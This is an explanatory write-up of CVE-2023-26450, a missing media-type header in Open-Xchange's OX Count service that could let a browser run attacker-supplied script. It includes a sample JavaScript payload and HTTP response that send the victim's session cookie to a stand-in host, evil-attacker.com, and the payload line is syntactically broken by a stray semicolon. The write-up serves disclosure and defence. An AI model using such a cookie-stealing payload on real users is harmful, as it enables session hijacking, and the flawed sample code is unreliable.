CVE-2023-26450 - How The "OX Count" Web Service Could Let Attackers Hijack Your Session

---

Introduction

In early 2023, the security research community flagged a vulnerability in a popular web service called OX Count. The issue is tracked as CVE-2023-26450. This isn't a story about hackers running wild through data centers. Instead, it’s a textbook example of what happens when software skips an important security check — in this case, specifying a media-type for data handled from external sources.

Let’s break down what CVE-2023-26450 is, why it matters, how it could be exploited, and what’s being done about it.

What Is The “OX Count” Web Service?

OX Count is a backend component, often used in the Open-Xchange (OX) webmail suite. It counts new messages, scheduled events, and other notifications for user dashboards, updating these in real time.

The Vulnerability, Simply Explained

When OX Count fetches information from outside sources (external resources), it needs to tell your browser what type of data it’s sending back—*for example*: “This is regular text” or “This is JavaScript.”

In this vulnerability, OX Count forgot to specify this "media-type" (Content-Type header) in its HTTP responses. Browsers, when not clearly told what something is, can make risky guesses. Sometimes, this means your browser might treat a plain text file as JavaScript—and run code that should never have been executed.

Key Problem:

OX Count *did not specify a media-type* when processing responses from external resources.

Real-World Impact:

Who Could Exploit It? How?

The risk here isn’t automatic:
- An attacker needs *either* to trick you into using OX with a compromised (malicious) account *or* have short-term access to your account.

Victim is convinced to login to a “booby-trapped” account.

2. Attacker arranges for a resource (like an attachment, notification, or other external content) to be referenced in a way that OX Count service fetches it.

3. The attacker’s malicious server returns a specially crafted response — containing a JavaScript payload.

4. Because OX Count doesn't declare a media-type, the victim's browser could execute the script as if it’s trusted OX code.

Suppose OX Count fetches data from

https://evil-attacker.com/malicious.js

The attacker sets up this file as

// malicious.js
document.location='https://evil-attacker.com/steal?cookie='; + document.cookie;

If the HTTP response is missing a Content-Type header, the browser may treat the response as a script—not just plain text.

A minimal HTTP response would look like

HTTP/1.1 200 OK
Content-Length: 60

document.location='https://evil-attacker.com/steal?cookie='; + document.cookie;

If the browser executes this, your session cookie can be sent directly to the attacker.

What Makes Exploitation Tricky?

- The attacker needs you to either visit their *controlled* account, or somehow sneak their malicious resource into OX Count’s input.

They cannot, from outside, attack random users.

- This makes the attack less “wormable,” and there are no public exploits known at the time of writing.

The Fix: Specify The Media-Type!

The solution is simple but powerful:

Define the accepted media-type. This means OX Count must always return, for example

Content-Type: application/json

or

Content-Type: text/plain; charset=UTF-8

By making it explicit, browsers won't try to treat plain text as executable code.

Sample code for safe HTTP response headers

response.setHeader("Content-Type", "application/json; charset=UTF-8");

The browser will see it as *just* data, not code.

---

Are There Any Public Exploits?

No.
There are currently no known public exploits for CVE-2023-26450. However, now that the issue is documented, attackers may try to research it further, so patching is strongly advised.

Links & References

- NVD Entry for CVE-2023-26450
- Original Advisory - Open-Xchange Security
- OWASP: Content-Type Sniffing
- MDN Web Docs: Content-Type

Conclusion

CVE-2023-26450 demonstrates how a simple oversight—missing an HTTP header—can snowball into a serious web security issue. If you’re running OX Count or Open-Xchange software, patch right away! Always ensure your web service responses clearly state the correct media-type, or you could be opening the door to attackers.

Remember:
Even rare attack paths should be closed, so your users remain safe.

Timeline

Published on: 08/02/2023 13:15:00 UTC
Last modified on: 08/07/2023 16:42:00 UTC